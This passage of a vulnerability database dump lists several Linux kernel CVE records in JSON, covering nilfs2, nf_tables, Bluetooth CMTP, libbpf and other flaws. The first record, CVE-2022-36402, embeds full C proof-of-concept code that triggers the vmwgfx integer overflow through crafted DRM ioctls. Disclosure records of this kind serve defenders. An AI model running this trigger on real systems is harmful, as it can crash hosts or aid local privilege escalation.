            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-36402",
    "datePublished": "2022-09-06T00:00:00",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-08-03T10:00:04.458Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3621
Vulnerability from cvelistv5
Published
2022-10-20 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel nilfs2 inode.c nilfs_bmap_lookup_at_level null pointer dereference
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.245Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=21a87d88c2253350e115029f14fe2a10a7e6c856"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211920"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=21a87d88c2253350e115029f14fe2a10a7e6c856"
        },
        {
          "url": "https://vuldb.com/?id.211920"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel nilfs2 inode.c nilfs_bmap_lookup_at_level null pointer dereference",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3621",
    "datePublished": "2022-10-20T00:00:00",
    "dateReserved": "2022-10-20T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.245Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-34981
Vulnerability from cvelistv5
Published
2024-05-07 22:54
Modified
2024-08-04 00:26
Severity
Summary
Linux Kernel Bluetooth CMTP Module Double Free Privilege Escalation Vulnerability
References
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:linux:kernel:4.15.0-118-generic:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "4.15.0-118-generic"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-34981",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-08T14:56:48.288493Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:12:51.708Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T00:26:55.716Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ZDI-21-1223",
            "tags": [
              "x_research-advisory",
              "x_transferred"
            ],
            "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1223/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15.0-118-generic"
            }
          ]
        }
      ],
      "dateAssigned": "2021-06-30T08:56:51.715-05:00",
      "datePublic": "2021-10-26T05:10:16.323-05:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Linux Kernel Bluetooth CMTP Module Double Free Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the CMTP module. The issue results from the lack of validating the existence of an object prior to performing further free operations on the object. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-11977."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-415",
              "description": "CWE-415: Double Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-07T22:54:49.205Z",
        "orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
        "shortName": "zdi"
      },
      "references": [
        {
          "name": "ZDI-21-1223",
          "tags": [
            "x_research-advisory"
          ],
          "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1223/"
        }
      ],
      "source": {
        "lang": "en",
        "value": "Ryota Shiga(@Ga_ryo_) of Flatt Security"
      },
      "title": "Linux Kernel Bluetooth CMTP Module Double Free Privilege Escalation Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
    "assignerShortName": "zdi",
    "cveId": "CVE-2021-34981",
    "datePublished": "2024-05-07T22:54:49.205Z",
    "dateReserved": "2021-06-17T19:27:05.661Z",
    "dateUpdated": "2024-08-04T00:26:55.716Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-6111
Vulnerability from cvelistv5
Published
2023-11-14 14:05
Modified
2024-08-02 08:21
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:21:17.363Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93995bf4af2c5a99e2a87f0cd5ce547d31eb7630"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/93995bf4af2c5a99e2a87f0cd5ce547d31eb7630"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IG6IF3FUY7LVZJMFRPANAU4L4PSJ3ESQ/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YQ7JVDEDZV5SNHG5EW7RHKK2ZN56HSGB/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S55P23EYAWDHXZPJEVTGIRZZRICYI3Z/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OXWBKK7RTQOGGDLQGCZFS753VLGS2GD/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.7",
              "status": "affected",
              "version": "6.6",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Lonial Kong"
        }
      ],
      "datePublic": "2023-11-08T12:52:32+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe function nft_trans_gc_catchall did not remove the catchall set element from the catchall_list when the argument sync is true, making it possible to free a catchall set element many times.\n\nWe recommend upgrading past commit 93995bf4af2c5a99e2a87f0cd5ce547d31eb7630.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-11-14T14:05:35.216Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93995bf4af2c5a99e2a87f0cd5ce547d31eb7630"
        },
        {
          "url": "https://kernel.dance/93995bf4af2c5a99e2a87f0cd5ce547d31eb7630"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IG6IF3FUY7LVZJMFRPANAU4L4PSJ3ESQ/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YQ7JVDEDZV5SNHG5EW7RHKK2ZN56HSGB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S55P23EYAWDHXZPJEVTGIRZZRICYI3Z/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OXWBKK7RTQOGGDLQGCZFS753VLGS2GD/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-6111",
    "datePublished": "2023-11-14T14:05:35.216Z",
    "dateReserved": "2023-11-13T20:25:06.272Z",
    "dateUpdated": "2024-08-02T08:21:17.363Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3534
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel libbpf btf_dump.c btf_dump_name_dups use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.420Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93c660ca40b5d2f7c1b1626e955a8e9fa30e0749"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211032"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211032."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93c660ca40b5d2f7c1b1626e955a8e9fa30e0749"
        },
        {
          "url": "https://vuldb.com/?id.211032"
        }
      ],
      "title": "Linux Kernel libbpf btf_dump.c btf_dump_name_dups use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3534",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.420Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3646
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF segment.c nilfs_attach_log_writer memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.291Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d51a97063db4704a5ef6bc978dddab1636a306"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211961"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d51a97063db4704a5ef6bc978dddab1636a306"
        },
        {
          "url": "https://vuldb.com/?id.211961"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel BPF segment.c nilfs_attach_log_writer memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3646",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.291Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3544
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Netfilter sysfs.c damon_sysfs_add_target memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.524Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf-next.git/commit/?id=1c8e2349f2d033f634d046063b704b2ca6c46972"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211044"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function damon_sysfs_add_target of the file mm/damon/sysfs.c of the component Netfilter. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211044."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf-next.git/commit/?id=1c8e2349f2d033f634d046063b704b2ca6c46972"
        },
        {
          "url": "https://vuldb.com/?id.211044"
        }
      ],
      "title": "Linux Kernel Netfilter sysfs.c damon_sysfs_add_target memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3544",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:01.524Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3523
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Driver memory.c use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.094Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16ce101db85db694a91380aa4c89b25530871d33"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211020"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
